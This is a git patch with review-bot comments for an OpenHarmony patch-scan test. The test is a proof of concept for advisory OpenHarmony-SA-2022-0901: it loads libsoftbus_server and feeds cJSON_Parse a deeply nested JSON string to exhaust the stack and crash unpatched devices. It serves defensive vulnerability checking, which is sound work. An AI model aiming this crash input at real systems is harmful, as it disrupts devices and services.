From 554fa3d78f7da9d55c3401bb9b557c2e058584ee Mon Sep 17 00:00:00 2001
From: jingyu123412 <1565704822@qq.com>
Date: Thu, 2 Mar 2023 17:37:57 +0800
Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0901?=
 =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: jingyu123412 <1565704822@qq.com>
---
 .../{poc.c => poc.cpp} | 41 +++++++++++++++++--
 .../2022-09/OpenHarmony-SA-2022-0901/poc.sh | 3 --
 2 files changed, 37 insertions(+), 7 deletions(-)
 rename demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/{poc.c => poc.cpp} (78%)
diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
similarity index 78%
rename from demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
rename to demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
index 442138216..4fdd7523d 100644
--- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
+++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
@@ -1,4 +1,4 @@
-/*
+/*
 * Copyright (c) 2023 Huawei Device Co., Ltd.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,12 +13,44 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -// 编译时需要使用-l参数链接cjson共享库 #include -#include +#include +//#include +#include +#include + +/* The cJSON structure: */ +typedef struct cJSON +{ + struct cJSON *next; + struct cJSON *prev; + struct cJSON *child; + int type; + char *valuestring; + int valueint; + double valuedouble; + char *string; +} cJSON; int main() { + void *handle; + // 打开共享库libsoftbus_server.z.so + handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY); + if (!handle) + { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManager::GetInstance地址 + typedef cJSON* (*Func)(char*); + Func cJSON_Parse = reinterpret_cast(dlsym(handle, "cJSON_Parse")); + if (cJSON_Parse == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } // 准备一个具有900层嵌套结构的json数据 char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; @@ -32,7 +64,8 @@ int main() } // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); - cJSON_Delete(root); + //cJSON_Delete(root); return 0; } + diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh index a2b1eff38..3636c48f8 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh @@ -19,8 +19,5 @@ #或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间 ulimit -s 60 -#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置 -export LD_LIBRARY_PATH=/data/local/tmp - #运行poc可执行程序 ./poc -- GitLab
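Review bot: With the file renamed to poc.cpp, the unchanged context line `char *json_string = "{...}";` becomes a string-literal-to-`char*` conversion that C++11 forbids (GCC and Clang at least warn on it), and the new `typedef cJSON* (*Func)(char*);` carries the same non-const type; declare it `const char *json_string = "...";` and use `typedef cJSON *(*Func)(const char *);`, which also matches cJSON_Parse's actual `const char *` parameter. The comment above the dlsym call, `// 获取函数DisplayManager::GetInstance地址`, names a symbol this code never touches and looks carried over from another test; replace it with `// resolve cJSON_Parse from the dlopen'd library via dlsym`. The local `cJSON` typedef duplicates the library's struct layout; nothing in this hunk dereferences the returned pointer, so the coupling is latent, but a one-line comment stating that the layout must track the loaded library's would help the next maintainer. As rendered here `reinterpret_cast(dlsym(...))` and the `#include` directives have lost their angle-bracketed operands, presumably a rendering artifact rather than the committed text. The body of main continues past this hunk.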
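Review bot: Commenting out `cJSON_Delete(root);` leaves dead code in place of the teardown, and with the library now reached through dlopen the parsed tree and `handle` are never released on this path; `return 0;` follows immediately, so the leak is process-lifetime only. The consistent fix is to resolve `cJSON_Delete` with dlsym exactly as `cJSON_Parse` is and call it before returning, or to delete the commented line and add `// no teardown: the process exits right after reporting` so the omission reads as intentional. main's body begins outside this hunk.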